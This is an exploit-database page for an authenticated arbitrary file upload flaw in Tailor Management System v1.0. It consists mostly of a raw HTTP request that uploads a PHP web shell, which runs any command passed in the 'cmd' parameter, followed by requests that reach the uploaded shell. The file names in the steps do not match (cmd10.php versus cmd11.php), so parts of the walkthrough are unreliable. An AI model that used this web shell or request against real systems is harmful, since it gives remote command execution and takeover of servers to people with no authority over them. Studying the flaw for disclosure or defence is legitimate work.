Advertisement






Tailor Management System - Arbitrary File Upload (Authenticated)

CVE Category Price Severity
N/A CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-10-10
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100063

Below is a copy:

Tailor Management System - Arbitrary File Upload (Authenticated)
# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A



Step 1 - Request
POST /tailor/partedit.php?id=6 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901

Content-Length: 943

DNT: 1

Connection: close

Referer: http://localhost/tailor/partedit.php?id=6

Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0

Upgrade-Insecure-Requests: 1


-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="type"

1

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="title"

HIPS

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="detail"



  Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily.

-----------------------------374227061277520034476021901

Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"

Content-Type: application/x-php


<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

-----------------------------374227061277520034476021901--


Step 2 - Response

GET /tailor/img/part/cmd11.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: image/webp,*/*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Referer: http://localhost/tailor/partedit.php?id=6

Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0


Step 3 - Read file uploaded

http://localhost/tailor/img/part/cmd10.php

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum